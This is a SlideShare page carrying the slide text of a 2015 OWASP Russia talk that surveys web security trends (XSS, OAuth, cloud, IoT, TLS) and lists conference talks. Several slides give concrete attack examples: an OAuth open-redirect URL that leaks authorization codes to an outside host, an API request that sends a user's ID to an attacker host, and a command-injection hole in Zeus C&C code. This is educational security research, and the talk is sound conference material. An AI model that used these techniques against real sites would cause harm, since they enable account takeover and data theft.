SlideShare a Scribd company logo

[2.1] Web application Security Trends - Omar Ganiev

Download as PPTX, PDF
OWASP Russia
OWASP Russia

This document summarizes recent trends in web application security vulnerabilities. Client-side attacks like XSS remain prominent along with emerging threats involving cloud computing, big data, and the Internet of Things. Old vulnerabilities persist in widely used software while new issues are found in new technologies. Overall, the growth of web applications and their interactions creates many new attack surfaces despite ongoing security improvements, ensuring hackers will continue finding novel ways to exploit systems.

Related slideshows

Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
1 of 45
Web application security trends Omar Ganiev 28/02/2015
Hi! I’m Beched, and I love hacking an solving problems. Let’s observe overall trends and some recently published papers, vulnerabilities and techniques, connected with web application security.
Classification Questions to classify the vulnerabilities: • Is the exploitation technique new or known? • Is the attack target new or known technology? • How large is a potential attack surface?
Sourcesof news • Bug trackers, mailing lists • https://blackhat.com/html/archives.html • https://blog.whitehatsec.com/top-10-web- hacking-techniques-2013/ • https://blog.whitehatsec.com/top-10-web- hacking-techniques-of-2014/ • …
Community opinion • 30.77% of respondents from rdot.org will go to dance a ballet, because web hacking is gonna become way too complex =)
Obvious remarks • Growth of security awareness of developers makes their code more secure • At the same time new products and technologies are often released without careful security audit • Old software is often considered as safe and trusty but contains severe vulnerabilities • Business logic bugs are alive
Obvious remarks • Infosec is part of CS and IT, and it inherits global trends • The global trend is a wide spread of various gadgets and mobile devices • The global trend is making houses and vehicles smart • The global trend is making web interfaces rich and self-contained in the browsers
Take a look • There’re loads of papers and presentations at BlackHat archives. If we filter those, which are connected with web security, and range the topics, we get the following scoreboard of trends: • client-side && mobile • clouds && big data && social networks • misc && classic • TLS && SSL • IoT && routers • PRNG && SSRF && etc • old soft
Client-side && Mobile • Known technologies, new life • There’re loads of papers on client-side security • Loads of bug bounties are given for XSS or something like that • There’re a lot of tricky techniques, and we can see a long war between browser developers and XSS hunters • Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases impact of XSS
Client-side && Mobile DISSECTING CSRF ATTACKS & COUNTERMEASURES JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME MILLION BROWSER BOTNET PIXEL PERFECT TIMING ATTACKS WITH HTML5 ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR REVISITING XSS SANITIZATION SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS TWO FACTOR FAILURE THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD
Client-side && Mobile • UXSS, MXSS • ChromeOS, FirefoxOS • Browser extensions hacking • Endless security features vs bypass war • XSS Auditor, CSP, HttpOnly, SOP, CORS • Funny things like RFD (reflected file download) • OAuth bugs
Example • Chrome XSS auditor breaks a lot of attacks, but in most cases it can be bypassed, or at least an attack can be modified • The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets • There’re plenty of bypasses, take a look at http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/ http://www.thespanner.co.uk/2015/02/19/another-xss-auditor- bypass/ https://www.blackhat.com/docs/us-14/materials/us-14-Johns- Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side- XSS-Filtering.pdf
Example • Other bypasses include CSRF tokens leakage, form target forgery, etc
Example • Secure CMS and XSS Auditor can be spoiled with plugins • Look at this typographic plugin for Drupal: var result = Typographus_Lite_UTF8.typo_text( $(this).text() ); $(this).after(result).remove(); • JQuery method after() is insecure. As a result, div contents become HTML-decoded, and all your reflected or stored <script> stuff becomes active
Example • OAuth is often vulnerable to open redirect due to lack of redirect_uri validation https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879 c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&sco pe=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257 After authorization redirects to: http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85 458d0db1c65792d52c8bef3c4407374b2 • Access token (code) value is enough for account takeover
Clouds && Big data && Social networks • Fairly new technologies • Cloud computing and machine learning are heavily used for different purposes • As for infosec, this can be used both for attack and defense • Social networks and big data providers can be exploited for deanonymization and fraud • Machine learning can be used for building WAF
Clouds && Big data && Social networks PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS BIG DATA FOR WEB APPLICATION SECURITY FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFIC PIVOTING IN AMAZON CLOUDS BRINGING A MACHETE TO THE AMAZON BABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALE SECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORING BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS HADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANT HOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS
Example • Post-exploitation of distributed web applications is often a bit tricky – you don’t exactly know which node will process your request • Nodes can often be enumerated via HTTP response headers or cookies • Sometimes some nodes are not updated and contain vulnerabilities • This creates mind-blowing phantom vulnerabilities =) • Take a look at cool talk about Amazon EC2 post- exploitation: https://www.blackhat.com/docs/us- 14/materials/us-14-Riancho-Pivoting-In-Amazon- Clouds.pdf
Example • Data providers are often used for targeted marketing. However, their data can sometimes be stolen and used for deanonymisation or fraud. This is documented API request: https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=htt p://incsecurity.ru/?adv_id=$UID • $UID will be replaced with actual cookie value by the server and will be sent to attacker host • Information about user can be obtained via JSONP hijacking, even if session id is checked.
Example • Request: https://*.ru/api/get/?uid=$UID&success_cb=_cb_s&fail_cb=_cb_e&st =1 • Response contains information about gender, interests, etc. Part of interests description file: … { "id": "40010082", "segment": "Fetish & Bondage", "category": "Interests", "section": "Interests", "description": "“ } …
Misc & Classic • There’re a lot of works which continue previous researches and bug reports • They improve exploitation of classical vulnerabilities like SQL injection and testing/analysis methods • The raise of penetration testing industry pushed up demand for .NET and J2EE applications hacking methods
Misc & Classic ') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES’)%00 INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA CONTEMPORARY AUTOMATIC PROGRAM ANALYSIS FINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG IMPLEMENTATIONS I KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS! SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS
Example • The paper about hacking C&C panels reminded me of the RCE vulnerability in Zeus C&C, which I published near 2010. I opened these links now: http://ahack.ru/bugs/zeus-vulnerability- exploit.htm https://github.com/Visgean/Zeus/ • Guess what I see there since 5 years? ;)
Example • The name of function has changed, but vulnerability is still there, AFAICS ... function fsarcCreate($archive, $files) ... $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); ... foreach($_POST['files'] as $file)$list[] = $_CUR_PATH.'/'.$file; ... if(!function_exists('fsarcCreate') || ($arcfile = fsarcCreate($arcfile, $list)) === false)die('Failed to create archive, please check "system/fsarc.php" script.'); ...
Example • This is a small example, probably there’re more critical vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code? • Paper on contemporary automatic program analysis mostly tells about grep =) • Personally I use grep with lovely regular expressions: w*(include|require)(_once)?[s(]+(?!s*('[^']*'|"[^"]*"| )[@s.]*(urlencode|rand|rawurlencode|basename|le venshtein|doubleval|sizeof|base64_encode|strlen|flo or|crypt|strrpos|filter_input|abs|bin2hex|bindec|has h|intval|max|decbin|strpos|crc32|ord|md5|count|sh a1|min|pathinfo|floatval|round|hexdec)s*()[^;]*$. *
Example
Example • 2014 has gone, and here comes 2015, but PHP and Apache are still broken • Several UAF vulnerabilities in PHP fixed recently, still a lot of restriction bypasses and RCE vulnerabilities live deep there • Apache has not yet learnt RFC • Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP
TLS && SSL • As old as the world • There’re still a lot of misconfiguration issues with HTTPS • Also there’re a lot of scary words like BEAST, CRIME, BREACH, HeartBleed, POODLE, SSLStrip and others • Many configuration mistakes are result of trade-off between performance and security
TLS && SSL SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME TLS 'SECRETS' TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS A PERFECT CRIME? ONLY TIME WILL TELL THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP BYPASSING HTTP STRICT TRANSPORT SECURITY
IoT && Routers • This is one of the most popular new IT trends everyone heard about • New means untested. Untested means vulnerable • Seriously, the Internet of things is broken, and many yell about it • People hack RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc
IoT && Routers EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER HOME INVASION V2.0 - ATTACKING NETWORK- CONTROLLED HARDWARE A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS
Example • Just look at this:
Example • And this:
Example • And this (admin;admin):
Example • BTW, side note: why doesn’t XSS Auditor perform HTTP response splitting check? • As you could see on the screenshot above, response splitting kills XSS Auditor, because we can inject header X-XSS-Protection: 0.
PRNG && SSRF && etc • XXE, SSRF and randomness hacking were hot topics of 2012-2013 • They are popular today too, new applications and attack vectors are developed
PRNG && SSRF && etc BLACK-BOX ASSESSMENT OF PSEUDORANDOM ALGORITHMS XML OUT-OF-BAND DATA RETRIEVAL THE NEW PAGE OF INJECTIONS BOOK: MEMCACHED INJECTIONS ICSCORSAIR: HOW I WILL PWN YOUR ERP THROUGH 4-20 MA CURRENT LOOP
Example • Autodiscover interface in OWA reveals an internal IP address of the mail server • Ev.owa interface with cPfdDC parameter can be used to send some LDAP requests and connect to different hosts (“domain controllers”) Microsoft.Exchange.Data.Directory.SuitabilityVerifie r.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential) • If there was bypass for anti-CSRF canary, you could possibly steal NTLM credentials
Example • vBulletin forum CMS allows to upload attachments from remote URL (class_upload.php, class_vurl.php) • First it checks the file size via HEAD request, then it downloads the file • You can use HTTP multiplexor to exploit race condition and return code 200 and valid file size for the first request and 302 redirect for the second request • Some configuration options and old versions of cURL allow file:// URL wrapper in Location header
Old soft • We’ve witnessed several critical vulnerabilities in well-known and widely used software in 2014 • HeartBleed, GHOST, ShellShock, POODLE, goto fail, etc • Probably it’s an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere
Old soft EPIDEMIOLOGY OF SOFTWARE VULNERABILITIES: A STUDY OF ATTACK SURFACE SPREAD SSL VALIDATION CHECKING VS. GO(ING) TO FAIL
Example • Although these famous vulnerabilities are not caused by web applications, they deeply affect them • ShellShock and GHOST affect webapp<->OS interaction layer • HeartBleed, goto fail, POODLE, affect mainly webapp<->encryption<->network interaction layer
Example • This is another proof of why shouldn’t we consider any part of the software as trusted. Each component of the system can be broken • BTW, newspapermen also started the era of nicknames for vulnerabilities • I find this a bit ridiculous but funny =)
Summary • The Internet is broken • The WWW is broken • Hackers gonna hack • Web applications become smarter • Hacking becomes smarter
Questions? beched@incsecurity.ru

More Related Content

[2.1] Web application Security Trends - Omar Ganiev

  • 2. Hi! I’m Beched, and I love hacking an solving problems. Let’s observe overall trends and some recently published papers, vulnerabilities and techniques, connected with web application security.
  • 3. Classification Questions to classify the vulnerabilities: • Is the exploitation technique new or known? • Is the attack target new or known technology? • How large is a potential attack surface?
  • 4. Sourcesof news • Bug trackers, mailing lists • https://blackhat.com/html/archives.html • https://blog.whitehatsec.com/top-10-web- hacking-techniques-2013/ • https://blog.whitehatsec.com/top-10-web- hacking-techniques-of-2014/ • …
  • 5. Community opinion • 30.77% of respondents from rdot.org will go to dance a ballet, because web hacking is gonna become way too complex =)
  • 6. Obvious remarks • Growth of security awareness of developers makes their code more secure • At the same time new products and technologies are often released without careful security audit • Old software is often considered as safe and trusty but contains severe vulnerabilities • Business logic bugs are alive
  • 7. Obvious remarks • Infosec is part of CS and IT, and it inherits global trends • The global trend is a wide spread of various gadgets and mobile devices • The global trend is making houses and vehicles smart • The global trend is making web interfaces rich and self-contained in the browsers
  • 8. Take a look • There’re loads of papers and presentations at BlackHat archives. If we filter those, which are connected with web security, and range the topics, we get the following scoreboard of trends: • client-side && mobile • clouds && big data && social networks • misc && classic • TLS && SSL • IoT && routers • PRNG && SSRF && etc • old soft
  • 9. Client-side && Mobile • Known technologies, new life • There’re loads of papers on client-side security • Loads of bug bounties are given for XSS or something like that • There’re a lot of tricky techniques, and we can see a long war between browser developers and XSS hunters • Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases impact of XSS
  • 10. Client-side && Mobile DISSECTING CSRF ATTACKS & COUNTERMEASURES JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME MILLION BROWSER BOTNET PIXEL PERFECT TIMING ATTACKS WITH HTML5 ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR REVISITING XSS SANITIZATION SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS TWO FACTOR FAILURE THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD
  • 11. Client-side && Mobile • UXSS, MXSS • ChromeOS, FirefoxOS • Browser extensions hacking • Endless security features vs bypass war • XSS Auditor, CSP, HttpOnly, SOP, CORS • Funny things like RFD (reflected file download) • OAuth bugs
  • 12. Example • Chrome XSS auditor breaks a lot of attacks, but in most cases it can be bypassed, or at least an attack can be modified • The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets • There’re plenty of bypasses, take a look at http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/ http://www.thespanner.co.uk/2015/02/19/another-xss-auditor- bypass/ https://www.blackhat.com/docs/us-14/materials/us-14-Johns- Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side- XSS-Filtering.pdf
  • 13. Example • Other bypasses include CSRF tokens leakage, form target forgery, etc
  • 14. Example • Secure CMS and XSS Auditor can be spoiled with plugins • Look at this typographic plugin for Drupal: var result = Typographus_Lite_UTF8.typo_text( $(this).text() ); $(this).after(result).remove(); • JQuery method after() is insecure. As a result, div contents become HTML-decoded, and all your reflected or stored &lt;script&gt; stuff becomes active
  • 15. Example • OAuth is often vulnerable to open redirect due to lack of redirect_uri validation https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879 c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&sco pe=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257 After authorization redirects to: http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85 458d0db1c65792d52c8bef3c4407374b2 • Access token (code) value is enough for account takeover
  • 16. Clouds && Big data && Social networks • Fairly new technologies • Cloud computing and machine learning are heavily used for different purposes • As for infosec, this can be used both for attack and defense • Social networks and big data providers can be exploited for deanonymization and fraud • Machine learning can be used for building WAF
  • 17. Clouds && Big data && Social networks PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS BIG DATA FOR WEB APPLICATION SECURITY FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFIC PIVOTING IN AMAZON CLOUDS BRINGING A MACHETE TO THE AMAZON BABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALE SECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORING BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS HADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANT HOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS
  • 18. Example • Post-exploitation of distributed web applications is often a bit tricky – you don’t exactly know which node will process your request • Nodes can often be enumerated via HTTP response headers or cookies • Sometimes some nodes are not updated and contain vulnerabilities • This creates mind-blowing phantom vulnerabilities =) • Take a look at cool talk about Amazon EC2 post- exploitation: https://www.blackhat.com/docs/us- 14/materials/us-14-Riancho-Pivoting-In-Amazon- Clouds.pdf
  • 19. Example • Data providers are often used for targeted marketing. However, their data can sometimes be stolen and used for deanonymisation or fraud. This is documented API request: https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=htt p://incsecurity.ru/?adv_id=$UID • $UID will be replaced with actual cookie value by the server and will be sent to attacker host • Information about user can be obtained via JSONP hijacking, even if session id is checked.
  • 20. Example • Request: https://*.ru/api/get/?uid=$UID&success_cb=_cb_s&fail_cb=_cb_e&st =1 • Response contains information about gender, interests, etc. Part of interests description file: … { "id": "40010082", "segment": "Fetish & Bondage", "category": "Interests", "section": "Interests", "description": "“ } …
  • 21. Misc & Classic • There’re a lot of works which continue previous researches and bug reports • They improve exploitation of classical vulnerabilities like SQL injection and testing/analysis methods • The raise of penetration testing industry pushed up demand for .NET and J2EE applications hacking methods
  • 22. Misc & Classic ') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES’)%00 INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA CONTEMPORARY AUTOMATIC PROGRAM ANALYSIS FINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG IMPLEMENTATIONS I KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS! SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS
  • 23. Example • The paper about hacking C&C panels reminded me of the RCE vulnerability in Zeus C&C, which I published near 2010. I opened these links now: http://ahack.ru/bugs/zeus-vulnerability- exploit.htm https://github.com/Visgean/Zeus/ • Guess what I see there since 5 years? ;)
  • 24. Example • The name of function has changed, but vulnerability is still there, AFAICS ... function fsarcCreate($archive, $files) ... $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); ... foreach($_POST['files'] as $file)$list[] = $_CUR_PATH.'/'.$file; ... if(!function_exists('fsarcCreate') || ($arcfile = fsarcCreate($arcfile, $list)) === false)die('Failed to create archive, please check "system/fsarc.php" script.'); ...
  • 25. Example • This is a small example, probably there’re more critical vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code? • Paper on contemporary automatic program analysis mostly tells about grep =) • Personally I use grep with lovely regular expressions: w*(include|require)(_once)?[s(]+(?!s*('[^']*'|"[^"]*"| )[@s.]*(urlencode|rand|rawurlencode|basename|le venshtein|doubleval|sizeof|base64_encode|strlen|flo or|crypt|strrpos|filter_input|abs|bin2hex|bindec|has h|intval|max|decbin|strpos|crc32|ord|md5|count|sh a1|min|pathinfo|floatval|round|hexdec)s*()[^;]*$. *
  • 27. Example • 2014 has gone, and here comes 2015, but PHP and Apache are still broken • Several UAF vulnerabilities in PHP fixed recently, still a lot of restriction bypasses and RCE vulnerabilities live deep there • Apache has not yet learnt RFC • Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP
  • 28. TLS && SSL • As old as the world • There’re still a lot of misconfiguration issues with HTTPS • Also there’re a lot of scary words like BEAST, CRIME, BREACH, HeartBleed, POODLE, SSLStrip and others • Many configuration mistakes are result of trade-off between performance and security
  • 29. TLS && SSL SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME TLS 'SECRETS' TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS A PERFECT CRIME? ONLY TIME WILL TELL THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP BYPASSING HTTP STRICT TRANSPORT SECURITY
  • 30. IoT && Routers • This is one of the most popular new IT trends everyone heard about • New means untested. Untested means vulnerable • Seriously, the Internet of things is broken, and many yell about it • People hack RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc
  • 31. IoT && Routers EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER HOME INVASION V2.0 - ATTACKING NETWORK- CONTROLLED HARDWARE A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS
  • 34. Example • And this (admin;admin):
  • 35. Example • BTW, side note: why doesn’t XSS Auditor perform HTTP response splitting check? • As you could see on the screenshot above, response splitting kills XSS Auditor, because we can inject header X-XSS-Protection: 0.
  • 36. PRNG && SSRF && etc • XXE, SSRF and randomness hacking were hot topics of 2012-2013 • They are popular today too, new applications and attack vectors are developed
  • 37. PRNG && SSRF && etc BLACK-BOX ASSESSMENT OF PSEUDORANDOM ALGORITHMS XML OUT-OF-BAND DATA RETRIEVAL THE NEW PAGE OF INJECTIONS BOOK: MEMCACHED INJECTIONS ICSCORSAIR: HOW I WILL PWN YOUR ERP THROUGH 4-20 MA CURRENT LOOP
  • 38. Example • Autodiscover interface in OWA reveals an internal IP address of the mail server • Ev.owa interface with cPfdDC parameter can be used to send some LDAP requests and connect to different hosts (“domain controllers”) Microsoft.Exchange.Data.Directory.SuitabilityVerifie r.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential) • If there was bypass for anti-CSRF canary, you could possibly steal NTLM credentials
  • 39. Example • vBulletin forum CMS allows to upload attachments from remote URL (class_upload.php, class_vurl.php) • First it checks the file size via HEAD request, then it downloads the file • You can use HTTP multiplexor to exploit race condition and return code 200 and valid file size for the first request and 302 redirect for the second request • Some configuration options and old versions of cURL allow file:// URL wrapper in Location header
  • 40. Old soft • We’ve witnessed several critical vulnerabilities in well-known and widely used software in 2014 • HeartBleed, GHOST, ShellShock, POODLE, goto fail, etc • Probably it’s an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere
  • 41. Old soft EPIDEMIOLOGY OF SOFTWARE VULNERABILITIES: A STUDY OF ATTACK SURFACE SPREAD SSL VALIDATION CHECKING VS. GO(ING) TO FAIL
  • 42. Example • Although these famous vulnerabilities are not caused by web applications, they deeply affect them • ShellShock and GHOST affect webapp<->OS interaction layer • HeartBleed, goto fail, POODLE, affect mainly webapp<->encryption<->network interaction layer
  • 43. Example • This is another proof of why shouldn’t we consider any part of the software as trusted. Each component of the system can be broken • BTW, newspapermen also started the era of nicknames for vulnerabilities • I find this a bit ridiculous but funny =)
  • 44. Summary • The Internet is broken • The WWW is broken • Hackers gonna hack • Web applications become smarter • Hacking becomes smarter